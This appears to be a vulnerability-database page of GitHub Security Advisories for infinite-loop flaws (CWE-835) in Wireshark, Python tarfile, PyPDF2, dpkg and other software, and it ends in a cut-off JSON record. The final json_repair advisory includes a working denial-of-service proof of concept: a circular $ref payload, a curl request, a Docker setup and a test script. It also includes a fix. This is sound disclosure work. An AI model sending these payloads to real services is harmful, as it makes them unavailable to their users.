CWE-835
AllowedLoop with Unreachable Exit Condition ('Infinite Loop')
Abstraction: Base · Status: Incomplete
The product contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.
1052 vulnerabilities reference this CWE, most recent first.
GHSA-X78Q-89F4-5W3C
Vulnerability from github – Published: 2022-05-13 01:47 – Updated: 2025-04-20 03:36In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.
{
"affected": [],
"aliases": [
"CVE-2017-7701"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-04-12T23:59:00Z",
"severity": "HIGH"
},
"details": "In Wireshark 2.2.0 to 2.2.5 and 2.0.0 to 2.0.11, the BGP dissector could go into an infinite loop, triggered by packet injection or a malformed capture file. This was addressed in epan/dissectors/packet-bgp.c by using a different integer data type.",
"id": "GHSA-x78q-89f4-5w3c",
"modified": "2025-04-20T03:36:01Z",
"published": "2022-05-13T01:47:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7701"
},
{
"type": "WEB",
"url": "https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13557"
},
{
"type": "WEB",
"url": "https://code.wireshark.org/review/gitweb?p=wireshark.git%3Ba=commit%3Bh=fa31f69b407436d0946f84baa0acdcc50962bf7a"
},
{
"type": "WEB",
"url": "https://code.wireshark.org/review/gitweb?p=wireshark.git;a=commit;h=fa31f69b407436d0946f84baa0acdcc50962bf7a"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/201706-12"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2017-16.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/97632"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038262"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X7VR-C387-8W57
Vulnerability from github – Published: 2021-08-25 21:01 – Updated: 2023-06-13 18:21HeaderMap::reserve() used usize::next_power_of_two() to calculate the increased capacity. However, next_power_of_two() silently overflows to 0 if given a sufficiently large number in release mode.
If the map was not empty when the overflow happens, the library will invoke self.grow(0) and start infinite probing. This allows an attacker who controls the argument to reserve() to cause a potential denial of service (DoS).
The flaw was corrected in 0.1.20 release of http crate.
{
"affected": [
{
"package": {
"ecosystem": "crates.io",
"name": "http"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.20"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-25574"
],
"database_specific": {
"cwe_ids": [
"CWE-190",
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2021-07-26T18:47:31Z",
"nvd_published_at": "2020-09-14T19:15:00Z",
"severity": "HIGH"
},
"details": "HeaderMap::reserve() used usize::next_power_of_two() to calculate the increased capacity. However, next_power_of_two() silently overflows to 0 if given a sufficiently large number in release mode.\n\nIf the map was not empty when the overflow happens, the library will invoke self.grow(0) and start infinite probing. This allows an attacker who controls the argument to reserve() to cause a potential denial of service (DoS).\n\nThe flaw was corrected in 0.1.20 release of http crate.",
"id": "GHSA-x7vr-c387-8w57",
"modified": "2023-06-13T18:21:10Z",
"published": "2021-08-25T21:01:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25574"
},
{
"type": "WEB",
"url": "https://github.com/hyperium/http/issues/352"
},
{
"type": "PACKAGE",
"url": "https://github.com/hyperium/http"
},
{
"type": "WEB",
"url": "https://rustsec.org/advisories/RUSTSEC-2019-0033.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Integer Overflow/Infinite Loop in the http crate"
}
GHSA-X8GX-VM44-MV77
Vulnerability from github – Published: 2022-11-15 12:00 – Updated: 2022-11-18 06:30Transient DOS due to loop with unreachable exit condition in WLAN firmware while parsing IPV6 extension header. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking
{
"affected": [],
"aliases": [
"CVE-2022-33239"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-11-15T10:15:00Z",
"severity": "HIGH"
},
"details": "Transient DOS due to loop with unreachable exit condition in WLAN firmware while parsing IPV6 extension header. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice \u0026 Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking",
"id": "GHSA-x8gx-vm44-mv77",
"modified": "2022-11-18T06:30:28Z",
"published": "2022-11-15T12:00:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33239"
},
{
"type": "WEB",
"url": "https://www.qualcomm.com/company/product-security/bulletins/november-2022-bulletin"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X8W5-J8FH-HPVP
Vulnerability from github – Published: 2026-03-07 09:30 – Updated: 2026-03-09 15:30It was discovered that dpkg-deb (a component of dpkg, the Debian package management system) does not properly validate the end of the data stream when uncompressing a zstd-compressed .deb archive, which may result in denial of service (infinite loop spinning the CPU).
{
"affected": [],
"aliases": [
"CVE-2026-2219"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-07T09:16:07Z",
"severity": "HIGH"
},
"details": "It was discovered that dpkg-deb (a component of dpkg, the Debian package management system) does not properly validate the end of the data stream when uncompressing a zstd-compressed .deb archive, which may result in denial of service (infinite loop spinning the CPU).",
"id": "GHSA-x8w5-j8fh-hpvp",
"modified": "2026-03-09T15:30:43Z",
"published": "2026-03-07T09:30:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2219"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/1129722"
},
{
"type": "WEB",
"url": "https://git.dpkg.org/cgit/dpkg/dpkg.git/commit/?id=6610297a62c0780dd0e80b0e302ef64fdcc9d313"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X9MM-6GPF-F749
Vulnerability from github – Published: 2022-05-17 03:00 – Updated: 2022-07-06 20:59HSLFSlideShow in Apache POI before 3.11 allows remote attackers to cause a denial of service (infinite loop and deadlock) via a crafted PPT file.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.poi:poi"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2014-9527"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-06T20:59:38Z",
"nvd_published_at": "2015-01-06T15:59:00Z",
"severity": "MODERATE"
},
"details": "HSLFSlideShow in Apache POI before 3.11 allows remote attackers to cause a denial of service (infinite loop and deadlock) via a crafted PPT file.",
"id": "GHSA-x9mm-6gpf-f749",
"modified": "2022-07-06T20:59:38Z",
"published": "2022-05-17T03:00:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9527"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2016:1135"
},
{
"type": "WEB",
"url": "https://issues.apache.org/bugzilla/show_bug.cgi?id=57272"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-February/150228.html"
},
{
"type": "WEB",
"url": "http://poi.apache.org/changes.html"
},
{
"type": "WEB",
"url": "http://secunia.com/advisories/61953"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996759"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Loop with Unreachable Exit Condition in Apache POI"
}
GHSA-XC76-5PF9-MX8M
Vulnerability from github – Published: 2025-03-14 17:31 – Updated: 2025-03-15 20:47Impact
Calling setTimer in Azle versions 0.27.0, 0.28.0, and 0.29.0 causes an immediate infinite loop of timers to be executed on the canister, each timer attempting to clean up the global state of the previous timer.
The infinite loop will occur with any valid invocation of setTimer.
Patches
The problem has been fixed as of Azle version 0.30.0.
Workarounds
If a canister is caught in this infinite loop after calling setTimer, the canister can be upgraded and the timers will all be cleared, thus ending the loop.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "azle"
},
"ranges": [
{
"events": [
{
"introduced": "0.27.0"
},
{
"fixed": "0.30.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-29776"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-14T17:31:07Z",
"nvd_published_at": "2025-03-14T14:15:18Z",
"severity": "HIGH"
},
"details": "### Impact\n\nCalling `setTimer` in Azle versions `0.27.0`, `0.28.0`, and `0.29.0` causes an immediate infinite loop of timers to be executed on the canister, each timer attempting to clean up the global state of the previous timer.\n\nThe infinite loop will occur with any valid invocation of `setTimer`.\n\n### Patches\n\nThe problem has been fixed as of Azle version `0.30.0`.\n\n### Workarounds\n\nIf a canister is caught in this infinite loop after calling `setTimer`, the canister can be upgraded and the timers will all be cleared, thus ending the loop.",
"id": "GHSA-xc76-5pf9-mx8m",
"modified": "2025-03-15T20:47:15Z",
"published": "2025-03-14T17:31:07Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/demergent-labs/azle/security/advisories/GHSA-xc76-5pf9-mx8m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29776"
},
{
"type": "PACKAGE",
"url": "https://github.com/demergent-labs/azle"
},
{
"type": "WEB",
"url": "https://github.com/demergent-labs/azle/releases/tag/0.30.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L",
"type": "CVSS_V4"
}
],
"summary": "In Azle, calling `setTimer` causes infinite loop of timers"
}
GHSA-XC97-8P9Q-CF27
Vulnerability from github – Published: 2022-05-24 17:22 – Updated: 2022-05-24 17:22In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.
{
"affected": [],
"aliases": [
"CVE-2019-20907"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-07-13T13:15:00Z",
"severity": "MODERATE"
},
"details": "In Lib/tarfile.py in Python through 3.8.3, an attacker is able to craft a TAR archive leading to an infinite loop when opened by tarfile.open, because _proc_pax lacks header validation.",
"id": "GHSA-xc97-8p9q-cf27",
"modified": "2022-05-24T17:22:47Z",
"published": "2022-05-24T17:22:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20907"
},
{
"type": "WEB",
"url": "https://github.com/python/cpython/pull/21454"
},
{
"type": "WEB",
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"type": "WEB",
"url": "https://usn.ubuntu.com/4428-1"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20200731-0002"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202008-01"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YSL3XWVDMSMKO23HR74AJQ6VEM3C2NTS"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YILCHHTNLH4GG4GSQBX2MZRKZBXOLCKE"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VT4AF72TJ2XNIKCR4WEBR7URBJJ4YZRD"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V53P2YOLEQH4J7S5QHXMKMZYFTVVMTMO"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V3TALOUBYU2MQD4BPLRTDQUMBKGCAXUA"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TOGKLGTXZLHQQFBVCAPSUDA6DOOJFNRY"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PDKKRXLNVXRF6VGERZSR3OMQR5D5QI6I"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OXI72HIHMXCQFWTULUXDG7VDA2BCYL4Y"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NTBKKOLFFNHG6CM4ACDX4APHSD5ZX5N4"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LE4O3PNDNNOMSKHNUKZKD3NGHIFUFDPX"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTUNTBJ3POHONQOTLEZC46POCIYYTAKZ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CNHPQGSP2YM3JAUD2VAMPXTIUQTZ2M2U"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CAXHCY4V3LPAAJOBCJ26ISZ4NUXQXTUZ"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36XI3EEQNMHGOZEI63Y7UV6XZRELYEAU"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00024.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00032.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00034.html"
},
{
"type": "WEB",
"url": "https://bugs.python.org/issue39017"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00051.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00052.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00053.html"
},
{
"type": "WEB",
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-08/msg00056.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XCJX-M2PJ-8G79
Vulnerability from github – Published: 2022-04-22 20:54 – Updated: 2024-10-14 16:49Impact
An attacker who uses this vulnerability can craft a PDF which leads to an infinite loop if the PyPDF2 user wrote the following code:
from PyPDF2 import PdfFileReader, PdfFileWriter
from PyPDF2.pdf import ContentStream
reader = PdfFileReader("malicious.pdf", strict=False)
for page in reader.pages:
ContentStream(page.getContents(), reader)
Patches
PyPDF2==1.27.5 and later are patched.
Credits to Sebastian Krause for finding (issue) and fixing (PR) it.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "PyPDF2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.27.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-24859"
],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2022-04-22T20:54:41Z",
"nvd_published_at": "2022-04-18T19:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nAn attacker who uses this vulnerability can craft a PDF which leads to an infinite loop if the PyPDF2 user wrote the following code:\n\n```python\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nfrom PyPDF2.pdf import ContentStream\n\nreader = PdfFileReader(\"malicious.pdf\", strict=False)\nfor page in reader.pages:\n ContentStream(page.getContents(), reader)\n```\n\n### Patches\n\n[`PyPDF2==1.27.5`](https://pypi.org/project/PyPDF2) and later are patched.\n\nCredits to [Sebastian Krause](https://github.com/sekrause) for finding ([issue](https://github.com/py-pdf/PyPDF2/issues/329)) and fixing ([PR](https://github.com/py-pdf/PyPDF2/pull/740)) it.\n",
"id": "GHSA-xcjx-m2pj-8g79",
"modified": "2024-10-14T16:49:22Z",
"published": "2022-04-22T20:54:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/py-pdf/PyPDF2/security/advisories/GHSA-xcjx-m2pj-8g79"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24859"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/PyPDF2/issues/329"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/PyPDF2/pull/740"
},
{
"type": "PACKAGE",
"url": "https://github.com/py-pdf/PyPDF2"
},
{
"type": "WEB",
"url": "https://github.com/py-pdf/PyPDF2/releases/tag/1.27.5"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pypdf2/PYSEC-2022-194.yaml"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/06/msg00001.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00013.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Manipulated inline images can cause Infinite Loop in PyPDF2"
}
GHSA-XF55-65PG-X58P
Vulnerability from github – Published: 2024-01-03 09:30 – Updated: 2025-11-04 00:30DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file
{
"affected": [],
"aliases": [
"CVE-2024-0211"
],
"database_specific": {
"cwe_ids": [
"CWE-674",
"CWE-835"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-01-03T08:15:11Z",
"severity": "HIGH"
},
"details": "DOCSIS dissector crash in Wireshark 4.2.0 allows denial of service via packet injection or crafted capture file",
"id": "GHSA-xf55-65pg-x58p",
"modified": "2025-11-04T00:30:42Z",
"published": "2024-01-03T09:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0211"
},
{
"type": "WEB",
"url": "https://gitlab.com/wireshark/wireshark/-/issues/19557"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00049.html"
},
{
"type": "WEB",
"url": "https://www.wireshark.org/security/wnpa-sec-2024-05.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-XF7X-X43H-RPQH
Vulnerability from github – Published: 2026-07-13 23:41 – Updated: 2026-07-13 23:41Circular JSON Schema $ref causes unbounded CPU DoS in json_repair
Summary
SchemaRepairer.resolve_schema() in json_repair follows JSON Schema $ref pointers in an unbounded while loop without any cycle detection. An attacker who can supply a schema containing a self-referencing $ref (e.g., via the demo Flask API or any application that passes untrusted input to loads(..., schema=...)), can cause a worker process to spin indefinitely on CPU, resulting in a complete denial of service. No authentication is required against the public demo API. The vulnerability is confirmed reproducible at CVSS 7.5 (High).
Details
SchemaRepairer.resolve_schema() at src/json_repair/schema_repair.py:184–190 resolves $ref chains using a plain while loop:
# src/json_repair/schema_repair.py:184-190
schema_dict = cast("dict[str, Any]", schema)
while "$ref" in schema_dict:
ref = schema_dict["$ref"]
resolved = self._resolve_ref(ref)
if isinstance(resolved, bool):
return resolved
schema_dict = resolved
_resolve_ref() at src/json_repair/schema_repair.py:654–665 always resolves references relative to self.root_schema, which is initialised from the caller-supplied schema (src/json_repair/schema_repair.py:130). When the schema contains a circular reference such as:
{"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}}
_resolve_ref() returns the same dict object on every iteration, so "$ref" in schema_dict is always True and the loop never terminates.
The vulnerable sink is reachable without authentication through the demo Flask API:
# docs/app.py:14, 21-36
data = request.get_json()
schema = data.get("schema")
if schema is not None and not isinstance(schema, (dict, bool)):
raise ValueError("schema must be a JSON object or boolean.")
...
if schema is not None:
loads_kwargs["schema"] = schema
parsed_json = loads(malformed_json, **loads_kwargs)
The only guard is a top-level isinstance(dict, bool) check; there is no $ref depth limit, no visited-set, and no timeout enforced by the library. The full data-flow path is:
docs/app.py:14—request.get_json()reads the attacker-controlled HTTP body.docs/app.py:21–23—schemais extracted; onlydict/booltype check applied.docs/app.py:33–36— schema is forwarded verbatim toloads().src/json_repair/json_repair.py:145–148—schema_from_input(schema)instantiatesSchemaRepairer.src/json_repair/json_repair.py:160—repairer.is_valid()callsresolve_schema(), triggering the infinite loop.src/json_repair/schema_repair.py:184–190— unboundedwhile "$ref" in schema_dictloop (sink).src/json_repair/schema_repair.py:654–665—_resolve_ref()returns the same object on every call.
Recommended fix:
--- a/src/json_repair/schema_repair.py
+++ b/src/json_repair/schema_repair.py
def resolve_schema(self, schema: object | None) -> dict[str, Any] | bool:
...
- schema_dict = cast("dict[str, Any]", schema)
+ schema_dict = cast("dict[str, Any]", schema)
+ seen_schema_ids: set[int] = set()
while "$ref" in schema_dict:
ref = schema_dict["$ref"]
+ if not isinstance(ref, str):
+ raise SchemaDefinitionError("$ref must be a string.")
+ schema_id = id(schema_dict)
+ if schema_id in seen_schema_ids:
+ raise SchemaDefinitionError(f"Circular $ref detected: {ref}")
+ seen_schema_ids.add(schema_id)
resolved = self._resolve_ref(ref)
if isinstance(resolved, bool):
return resolved
schema_dict = resolved
return schema_dict
PoC
Environment setup:
# Clone the affected version
git clone https://github.com/mangiucugna/json_repair.git
git -C json_repair checkout 0015c74c01bdafe4bb7435780657501741c2a5f7
# Install dependencies
pip install flask flask-cors jsonschema pydantic
pip install -e json_repair/
# Start the demo API
PYTHONPATH=json_repair/src flask --app json_repair/docs/app run --host=127.0.0.1 --port=5005
Alternatively, use the provided Docker image:
FROM python:3.11-slim
WORKDIR /app
COPY repo/ /app/repo/
RUN pip install --no-cache-dir flask flask-cors jsonschema pydantic && \
pip install --no-cache-dir -e /app/repo/
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "/app/poc.py"]
docker build -t vuln001-json-repair -f vuln-001/Dockerfile .
docker run --rm vuln001-json-repair
HTTP attack request (demo API):
timeout 5 curl -sS -X POST http://127.0.0.1:5005/api/repair-json \
-H 'Content-Type: application/json' \
--data '{"malformedJSON":"{}","schema":{"$ref":"#/definitions/a","definitions":{"a":{"$ref":"#/definitions/a"}}}}'
# Expected: no response before timeout; curl exits with code 124
Direct library attack:
timeout 5 python3 - <<'PY'
from json_repair import loads
schema = {"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}}
print(loads("{}", schema=schema))
PY
# Expected: process killed after 5 s; exit code 124
Observed results (from Docker-based dynamic reproduction):
- Baseline (valid schema
{"type":"object","properties":{"name":{"type":"string"}}}): completed in 0.261 s. - Attack (circular
$refschema): timed out after 5.01 s — process killed; infinite loop confirmed.
Impact
This is an unauthenticated denial-of-service vulnerability. Any single HTTP request carrying a circular $ref schema hangs the Flask worker process indefinitely, making the service unavailable to all other users until the process is killed or the server is restarted. Because the public demo API (docs/app.py) accepts the schema field from the request body without authentication and passes it directly to loads(), remote attackers can exploit this with a trivial one-liner.
Beyond the demo API, any application that exposes json_repair.loads(..., schema=<user-controlled>) to untrusted callers is equally affected. The vulnerability requires no special privileges, produces no useful output for the attacker (confidentiality and integrity are unaffected), and is deterministically reproducible.
Reproduction artifacts
Dockerfile
FROM python:3.11-slim
WORKDIR /app
# Copy the vulnerable json_repair repository (build context is the report root)
COPY repo/ /app/repo/
# Install Flask demo API dependencies and schema extras
RUN pip install --no-cache-dir \
flask \
flask-cors \
jsonschema \
pydantic && \
pip install --no-cache-dir -e /app/repo/
# Copy the proof-of-concept script
COPY vuln-001/poc.py /app/poc.py
CMD ["python3", "/app/poc.py"]
poc.py
#!/usr/bin/env python3
"""
PoC for VULN-001: Circular JSON Schema $ref causes unbounded CPU DoS
CWE-835 — Loop with Unreachable Exit Condition
Affected: json_repair <= 0.59.10 (commit 0015c74)
Sink: src/json_repair/schema_repair.py:185
SchemaRepairer.resolve_schema() while loop follows $ref without cycle detection.
Attack schema:
{"$ref": "#/definitions/a", "definitions": {"a": {"$ref": "#/definitions/a"}}}
When passed to loads(..., schema=<above>), resolve_schema() enters an infinite loop
because _resolve_ref() always returns the same dict object from root_schema.
Verdict logic:
- Baseline (valid schema) must complete in < TIMEOUT seconds.
- Attack (circular $ref) must still be running at TIMEOUT seconds.
Both conditions together constitute deterministic proof of the vulnerability.
"""
import os
import subprocess
import sys
import tempfile
import time
# Seconds to wait before declaring the attack confirmed (infinite loop)
TIMEOUT_SECONDS = 5
CIRCULAR_SCHEMA = {
"$ref": "#/definitions/a",
"definitions": {
"a": {"$ref": "#/definitions/a"}
}
}
NORMAL_SCHEMA = {
"type": "object",
"properties": {
"name": {"type": "string"}
}
}
_RUNNER_TEMPLATE = """\
import sys
sys.path.insert(0, '/app/repo/src')
from json_repair import loads
schema = {schema_repr}
result = loads('{{}}', schema=schema)
print(result)
"""
def run_schema_test(schema: dict, timeout: int) -> tuple[bool, float, str]:
"""
Run json_repair loads() with the given schema in an isolated subprocess.
Returns:
timed_out (bool): True if the process was still running at `timeout` seconds.
elapsed (float): Wall-clock seconds until completion or kill.
output (str): stdout/stderr excerpt.
"""
script_content = _RUNNER_TEMPLATE.format(schema_repr=repr(schema))
with tempfile.NamedTemporaryFile(mode="w", suffix=".py", delete=False) as fh:
fh.write(script_content)
script_path = fh.name
start = time.monotonic()
try:
proc = subprocess.run(
[sys.executable, script_path],
timeout=timeout,
capture_output=True,
text=True,
)
elapsed = time.monotonic() - start
output = (proc.stdout.strip() or proc.stderr.strip())[:400]
return False, elapsed, output
except subprocess.TimeoutExpired:
elapsed = time.monotonic() - start
return True, elapsed, f"[no output — process killed after {elapsed:.2f}s]"
finally:
os.unlink(script_path)
def main() -> int:
print("=" * 64)
print("VULN-001 PoC: Circular $ref JSON Schema DoS")
print("json_repair SchemaRepairer.resolve_schema() — CWE-835")
print("=" * 64)
# --- Test 1: baseline (must complete quickly) ---
print(f"\n[TEST 1] Baseline — valid schema (expect completion < {TIMEOUT_SECONDS}s)")
timed_out_baseline, elapsed_baseline, output_baseline = run_schema_test(
NORMAL_SCHEMA, TIMEOUT_SECONDS
)
if timed_out_baseline:
print(f" UNEXPECTED TIMEOUT after {elapsed_baseline:.2f}s — environment issue")
baseline_ok = False
else:
print(f" COMPLETED in {elapsed_baseline:.3f}s -> {output_baseline}")
baseline_ok = True
# --- Test 2: circular $ref attack (must time out) ---
print(
f"\n[TEST 2] Attack — circular $ref schema"
f" (expect hang > {TIMEOUT_SECONDS}s)"
)
print(f" Schema: {CIRCULAR_SCHEMA}")
timed_out_attack, elapsed_attack, output_attack = run_schema_test(
CIRCULAR_SCHEMA, TIMEOUT_SECONDS
)
if timed_out_attack:
print(
f" TIMED OUT after {elapsed_attack:.2f}s "
f"— infinite loop CONFIRMED (VULNERABLE)"
)
attack_confirmed = True
else:
print(
f" Completed in {elapsed_attack:.3f}s -> {output_attack}"
f"\n (patched or not triggered — check installation)"
)
attack_confirmed = False
# --- Summary ---
print("\n" + "=" * 64)
if baseline_ok and attack_confirmed:
print("VERDICT: PASS")
print(" Normal schema : returned in under 1 s")
print(f" Circular $ref : still running after {TIMEOUT_SECONDS}s (killed)")
print(" Conclusion: resolve_schema() enters an unbounded loop on circular $ref.")
return 0
elif not attack_confirmed:
print("VERDICT: FAIL — circular $ref did not cause an infinite loop")
print(" The library may already be patched in this build.")
return 2
else:
print("VERDICT: FAIL — baseline test failed; check the environment")
return 3
if __name__ == "__main__":
sys.exit(main())
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "json-repair"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.60.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-835"
],
"github_reviewed": true,
"github_reviewed_at": "2026-07-13T23:41:39Z",
"nvd_published_at": null,
"severity": "HIGH"
},
